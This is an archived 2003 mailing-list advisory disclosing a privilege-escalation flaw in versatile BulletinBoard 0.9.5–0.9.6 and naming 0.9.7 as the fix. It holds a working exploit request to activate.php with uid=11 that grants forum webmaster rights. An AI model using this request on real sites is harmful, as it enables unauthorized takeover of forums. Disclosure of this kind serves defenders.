|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: NaSsEr .M.Sh (nmsh_sa_at_yahoo.com)
Date: Fri Jan 10 2003 - 12:03:44 CST
Vulnerable systems:
0.9.6
0.9.5
Immune systems:
0.9.7
Impact:
versatile BulletinBoard suffers from a vulnerability that allows attacker to be a forum webmaster due to a bug in activation method.
Exploit:
uid=11 <===== is webmaster by default
http://target.com/forumfolder/activate.php?uid=11&ac=0
Now click on button (go to forums).
NOW YOU HAVE WEBMASTER PRIVILEGES
Solution:
Upgrade to the latest version of versatile BulletinBoard (version 0.9.7).
- Website :http://vbb.eniki.de
Provided by :
Nasser.M.Sh
nmsh_sa
yahoo.com
---------------------------------
Do you Yahoo!?
Yahoo! Mail Plus - Powerful. Affordable. Sign up now
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]